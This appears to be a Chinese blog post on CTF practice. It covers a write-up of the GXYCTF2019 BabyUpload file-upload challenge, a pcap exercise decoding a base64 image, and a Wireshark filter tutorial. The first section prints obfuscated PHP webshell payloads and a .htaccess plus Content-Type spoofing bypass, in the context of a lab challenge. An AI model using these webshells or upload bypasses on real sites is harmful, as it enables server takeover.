1.[GXYCTF2019]BabyUpload
1)打开题目也是没有任何提示,
2)进入环境,看到下面页面猜测是文件上传漏洞,下面开始传文件
3)首先上传一句话木马 a.php,代码如下:
下面这个代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。
<?php$a="a"."s";$b="s"."e"."rt";$c=$a.$b;$c($_POST['123']);
?>
提示后缀不能有ph,那么根据前面做过类似文件上传的题,php3,php5,phtml等后缀也无法使用了。
5)那就将文件后缀改为 jpg,上传后页面如下:
6)由此我们得知,后端检测出我们的.jpg文件源码中含有php代码。
那么只有将.jpg文件中的php代码用 javascript 的形式代替了,代码如下:
<script language='php'>$a = "a"."s";$b = "s"."e"."r"."t";$c = $a.$b;$c($_POST["123"]);
</script>
重新上传,页面如下:
7)这里也是上传成功了,接下来按照之前做题惯例,它应该还得解析jpg文件中的php代码了,这时就需要上传.htaccess文件来帮助解析,它必须包含以下代码
SetHandler application/x-httpd-php
这条命令可以解析所有后缀文件中的 php 代码。
上传出现这问题我也是懵了,抓个包看看吧
猜测应该是,后端代码对文件类型--Content-type有限制。
这就需要我们在上传 .htaccess 文件的同时,利用Burpsuite进行抓包,修改 Content-type为image/jpeg,如下:
修改为image/jpeg
然后放包
页面显示上传成功(.htaccess successfully uploaded)
然后再次上传jpg文件,如下:
由此可以拼接网址
http://c36ead8b-24f9-48f5-ab15-e7308cb50dc7.node5.buuoj.cn:81/upload/c9b8b9f7c985fa1d10ca30c0f9a2de85/b.jpg
然后用蚁剑链接
成功找到flag
总结一下这题简单来说它就是过滤了php,限制了文件上传的内容,然后需要解析jpg文件,需要上传.htaccess文件来进行解析,以及修改数据类型,拼接url头等
2.数据包中的线索
1)下载附件,用wireshark打开,从中进行数据分析
2)过滤一下http流
3)找到一个状态值为200的,看着有点问题,打开seesee
看到里面是类似于base64编码的一大篇
4)选中编码去解码,注意最后面多了个0要去掉
太大解析不出来,直接将他存为图片
拿到 flag{209acebf6324a09671abc31c869de72c}
当然这里需要注意的是
/9j是jpg文件头的 base64 编码
3.最后加上昨天学的再总结一下流量分析
首先whireshark提供了三个主要面板,包括:
抓包面板(Capture Panel):
抓包面板用于捕获网络数据包,并显示已经捕获的数据包列表。在该面板中,可以选择捕获的网络接口、设置捕获过滤器、启动和停止抓包等操作。此外,还可以通过右键单击数据包,查看详细信息、导出数据包、跟踪TCP流等。
数据包列表面板(Packet List Panel):
数据包列表面板显示已经捕获的数据包列表,其中每个数据包占据一行,并列出了有关该数据包的一些关键信息,如时间戳、源IP地址、目标IP地址、协议类型、数据包长度等。此外,还可以通过对列表进行排序、筛选、搜索等操作,方便用户查找和分析数据包。
数据包详情面板(Packet Detail Panel):
数据包详情面板显示选定数据包的详细信息,包括各个协议层的数据结构和字段值。用户可以通过展开不同的节点,查看不同的协议头和数据负载,帮助用户深入理解数据包的内容和意义。
常用语法:
(在搜索框输入http即可看http的流量)
tcp:显示所有TCP协议的数据包
udp:显示所有UDP协议的数据包
http:显示所有HTTP协议的数据包
dns:显示所有DNS协议的数据包
icmp:显示所有ICMP协议的数据包
ip地址筛选:
ip.addr == 192.168.0.1:显示与指定IP地址相关的所有数据包
ip.src == 192.168.0.1 :显示源IP地址为指定地址的数据包
ip.dst == 192.168.0.2:显示目标IP地址为指定地址的数据包
端口筛选:
tcp.port == 80:显示使用指定TCP端口的数据包
udp.port == 53:显示使用指定UDP端口的数据包
比较运算符:
==:等于,例如:http.request.method == "POST"
!=:不等于,例如:ip.addr != 192.168.0.1
<、>:小于、大于,例如:frame.len > 100 或 frame.len < 50,可以指定过滤数据包长度
数据包内容过滤规则:
http.request.method == "GET" 或 tcp.flags.syn == 1,可以通过指定数据包内容,只保留符合条件的数据包。
注: 关于我也不太懂的一点
# 就是在TCP三次握手过程中,客户端向服务端发送一个SYN标志的数据包,表示请求建立连接。而tcp.flags.syn == 1就是Wireshark中用于匹配TCP SYN标志的过滤规则,其中1表示该标志位被置为1,表示该数据包是一个SYN数据包。当Wireshark捕获到一个TCP数据包时,会检查该数据包的TCP头部中的SYN标志位是否被置为1,如果符合条件,则该数据包会被匹配并显示出来。这样,用户就可以快速过滤出所有的TCP SYN数据包,方便进行相关的分析和处理。